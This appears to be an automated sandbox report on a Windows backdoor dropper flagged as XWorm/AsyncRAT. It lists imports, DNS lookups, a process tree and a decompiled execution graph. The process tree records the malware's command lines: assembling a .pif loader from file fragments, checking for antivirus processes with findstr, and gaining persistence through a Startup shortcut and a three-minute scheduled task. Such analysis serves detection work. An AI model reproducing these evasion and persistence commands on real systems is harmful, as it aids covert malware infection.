                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 29, 2024 11:38:12.744581938 CET5901653192.168.2.71.1.1.1
                                                    Mar 29, 2024 11:38:12.879523993 CET53590161.1.1.1192.168.2.7
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Mar 29, 2024 11:38:12.744581938 CET192.168.2.71.1.1.10xe3ecStandard query (0)sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqFA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 29, 2024 11:38:12.879523993 CET1.1.1.1192.168.2.70xe3ecName error (3)sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqFnonenoneA (IP address)IN (0x0001)false

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:11:38:08
                                                    Start date:29/03/2024
                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"
                                                    Imagebase:0x400000
                                                    File size:10'515'536 bytes
                                                    MD5 hash:63B3DD980AC9A06FD167B0DF8121C979
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:11:38:08
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:11:38:08
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:11:38:09
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:tasklist
                                                    Imagebase:0x850000
                                                    File size:79'360 bytes
                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:11:38:09
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                    Imagebase:0x180000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:11:38:10
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:tasklist
                                                    Imagebase:0x850000
                                                    File size:79'360 bytes
                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:11:38:10
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                    Imagebase:0x180000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:11:38:10
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c md 23855
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:11:38:10
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:11:38:10
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c copy /b Stream + Keyboard 23855\R
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
                                                    Wow64 process (32bit):true
                                                    Commandline:23855\Telecom.pif 23855\R
                                                    Imagebase:0x440000
                                                    File size:947'288 bytes
                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 1%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:ping -n 5 127.0.0.1
                                                    Imagebase:0xec0000
                                                    File size:18'944 bytes
                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
                                                    Imagebase:0x7a0000
                                                    File size:187'904 bytes
                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:11:38:11
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
                                                    Imagebase:0x7ff6613d0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:11:38:12
                                                    Start date:29/03/2024
                                                    Path:C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
                                                    Imagebase:0x440000
                                                    File size:947'288 bytes
                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 1%, Virustotal, Browse
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:11:38:24
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
                                                    Imagebase:0x7ff6613d0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:11:38:25
                                                    Start date:29/03/2024
                                                    Path:C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
                                                    Imagebase:0x440000
                                                    File size:947'288 bytes
                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:13:10:27
                                                    Start date:29/03/2024
                                                    Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
                                                    Imagebase:0x1b0000
                                                    File size:65'440 bytes
                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 0%, Virustotal, Browse
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:13:10:27
                                                    Start date:29/03/2024
                                                    Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
                                                    Imagebase:0xa50000
                                                    File size:65'440 bytes
                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:false

                                                    Target ID:37
                                                    Start time:13:10:36
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
                                                    Imagebase:0xed0000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:13:11:00
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
                                                    Imagebase:0x7ff6613d0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:13:11:01
                                                    Start date:29/03/2024
                                                    Path:C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
                                                    Imagebase:0x440000
                                                    File size:947'288 bytes
                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:40
                                                    Start time:13:11:07
                                                    Start date:29/03/2024
                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                    Imagebase:0x7ff7726e0000
                                                    File size:468'120 bytes
                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:41
                                                    Start time:13:11:07
                                                    Start date:29/03/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:13.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:16.7%
                                                      Total number of Nodes:1355
                                                      Total number of Limit Nodes:19
                                                      execution_graph 3034 4015c1 3054 402da6 3034->3054 3038 401631 3040 401663 3038->3040 3041 401636 3038->3041 3044 401423 24 API calls 3040->3044 3070 401423 3041->3070 3051 40165b 3044->3051 3047 4015d1 3047->3038 3050 401617 GetFileAttributesW 3047->3050 3053 4015fa 3047->3053 3066 405e16 3047->3066 3074 405ae5 3047->3074 3082 405ac8 CreateDirectoryW 3047->3082 3049 40164a SetCurrentDirectoryW 3049->3051 3050->3047 3053->3047 3077 405a4b CreateDirectoryW 3053->3077 3055 402db2 3054->3055 3085 406557 3055->3085 3058 4015c8 3060 405e94 CharNextW CharNextW 3058->3060 3061 405eb1 3060->3061 3063 405ec3 3060->3063 3061->3063 3064 405ebe CharNextW 3061->3064 3062 405ee7 3062->3047 3063->3062 3065 405e16 CharNextW 3063->3065 3064->3062 3065->3063 3067 405e1c 3066->3067 3068 405e32 3067->3068 3069 405e23 CharNextW 3067->3069 3068->3047 3069->3067 3123 40557c 3070->3123 3073 40651a lstrcpynW 3073->3049 3134 4068e7 GetModuleHandleA 3074->3134 3078 405a9c GetLastError 3077->3078 3079 405a98 3077->3079 3078->3079 3080 405aab SetFileSecurityW 3078->3080 3079->3053 3080->3079 3081 405ac1 GetLastError 3080->3081 3081->3079 3083 405ad8 3082->3083 3084 405adc GetLastError 3082->3084 3083->3047 3084->3083 3089 406564 3085->3089 3086 406787 3087 402dd3 3086->3087 3118 40651a lstrcpynW 3086->3118 3087->3058 3102 4067a1 3087->3102 3089->3086 3090 406755 lstrlenW 3089->3090 3091 406557 10 API calls 3089->3091 3092 40666c GetSystemDirectoryW 3089->3092 3096 40667f GetWindowsDirectoryW 3089->3096 3097 4066f6 lstrcatW 3089->3097 3098 406557 10 API calls 3089->3098 3099 4067a1 5 API calls 3089->3099 3100 4066ae SHGetSpecialFolderLocation 3089->3100 3111 4063e8 3089->3111 3116 406461 wsprintfW 3089->3116 3117 40651a lstrcpynW 3089->3117 3090->3089 3091->3090 3092->3089 3096->3089 3097->3089 3098->3089 3099->3089 3100->3089 3101 4066c6 SHGetPathFromIDListW CoTaskMemFree 3100->3101 3101->3089 3109 4067ae 3102->3109 3103 406824 3104 406829 CharPrevW 3103->3104 3107 40684a 3103->3107 3104->3103 3105 406817 CharNextW 3105->3103 3105->3109 3106 405e16 CharNextW 3106->3109 3107->3058 3108 406803 CharNextW 3108->3109 3109->3103 3109->3105 3109->3106 3109->3108 3110 406812 CharNextW 3109->3110 3110->3105 3119 406387 3111->3119 3114 40641c RegQueryValueExW RegCloseKey 3115 40644c 3114->3115 3115->3089 3116->3089 3117->3089 3118->3087 3120 406396 3119->3120 3121 40639a 3120->3121 3122 40639f RegOpenKeyExW 3120->3122 3121->3114 3121->3115 3122->3121 3124 405597 3123->3124 3125 401431 3123->3125 3126 4055b3 lstrlenW 3124->3126 3127 406557 17 API calls 3124->3127 3125->3073 3128 4055c1 lstrlenW 3126->3128 3129 4055dc 3126->3129 3127->3126 3128->3125 3130 4055d3 lstrcatW 3128->3130 3131 4055e2 SetWindowTextW 3129->3131 3132 4055ef 3129->3132 3130->3129 3131->3132 3132->3125 3133 4055f5 SendMessageW SendMessageW SendMessageW 3132->3133 3133->3125 3135 406903 3134->3135 3136 40690d GetProcAddress 3134->3136 3140 406877 GetSystemDirectoryW 3135->3140 3138 405aec 3136->3138 3138->3047 3139 406909 3139->3136 3139->3138 3141 406899 wsprintfW LoadLibraryExW 3140->3141 3141->3139 3624 401c43 3646 402d84 3624->3646 3626 401c4a 3627 402d84 17 API calls 3626->3627 3628 401c57 3627->3628 3629 401c6c 3628->3629 3630 402da6 17 API calls 3628->3630 3631 401c7c 3629->3631 3632 402da6 17 API calls 3629->3632 3630->3629 3633 401cd3 3631->3633 3634 401c87 3631->3634 3632->3631 3635 402da6 17 API calls 3633->3635 3636 402d84 17 API calls 3634->3636 3637 401cd8 3635->3637 3638 401c8c 3636->3638 3639 402da6 17 API calls 3637->3639 3640 402d84 17 API calls 3638->3640 3641 401ce1 FindWindowExW 3639->3641 3642 401c98 3640->3642 3645 401d03 3641->3645 3643 401cc3 SendMessageW 3642->3643 3644 401ca5 SendMessageTimeoutW 3642->3644 3643->3645 3644->3645 3647 406557 17 API calls 3646->3647 3648 402d99 3647->3648 3648->3626 3649 4028c4 3650 4028ca 3649->3650 3651 4028d2 FindClose 3650->3651 3652 402c2a 3650->3652 3651->3652 3656 4016cc 3657 402da6 17 API calls 3656->3657 3658 4016d2 GetFullPathNameW 3657->3658 3659 4016ec 3658->3659 3665 40170e 3658->3665 3661 406850 2 API calls 3659->3661 3659->3665 3660 401723 GetShortPathNameW 3663 402c2a 3660->3663 3662 4016fe 3661->3662 3662->3665 3666 40651a lstrcpynW 3662->3666 3665->3660 3665->3663 3666->3665 3667 401e4e GetDC 3668 402d84 17 API calls 3667->3668 3669 401e60 GetDeviceCaps MulDiv ReleaseDC 3668->3669 3670 402d84 17 API calls 3669->3670 3671 401e91 3670->3671 3672 406557 17 API calls 3671->3672 3673 401ece CreateFontIndirectW 3672->3673 3674 402638 3673->3674 3675 402950 3676 402da6 17 API calls 3675->3676 3678 40295c 3676->3678 3677 402972 3680 405fe5 2 API calls 3677->3680 3678->3677 3679 402da6 17 API calls 3678->3679 3679->3677 3681 402978 3680->3681 3703 40600a GetFileAttributesW CreateFileW 3681->3703 3683 402985 3684 402a3b 3683->3684 3687 4029a0 GlobalAlloc 3683->3687 3688 402a23 3683->3688 3685 402a42 DeleteFileW 3684->3685 3686 402a55 3684->3686 3685->3686 3687->3688 3689 4029b9 3687->3689 3690 4032b4 31 API calls 3688->3690 3704 4034c2 SetFilePointer 3689->3704 3692 402a30 CloseHandle 3690->3692 3692->3684 3693 4029bf 3694 4034ac ReadFile 3693->3694 3695 4029c8 GlobalAlloc 3694->3695 3696 4029d8 3695->3696 3697 402a0c 3695->3697 3698 4032b4 31 API calls 3696->3698 3699 4060bc WriteFile 3697->3699 3701 4029e5 3698->3701 3700 402a18 GlobalFree 3699->3700 3700->3688 3702 402a03 GlobalFree 3701->3702 3702->3697 3703->3683 3704->3693 3705 401956 3706 402da6 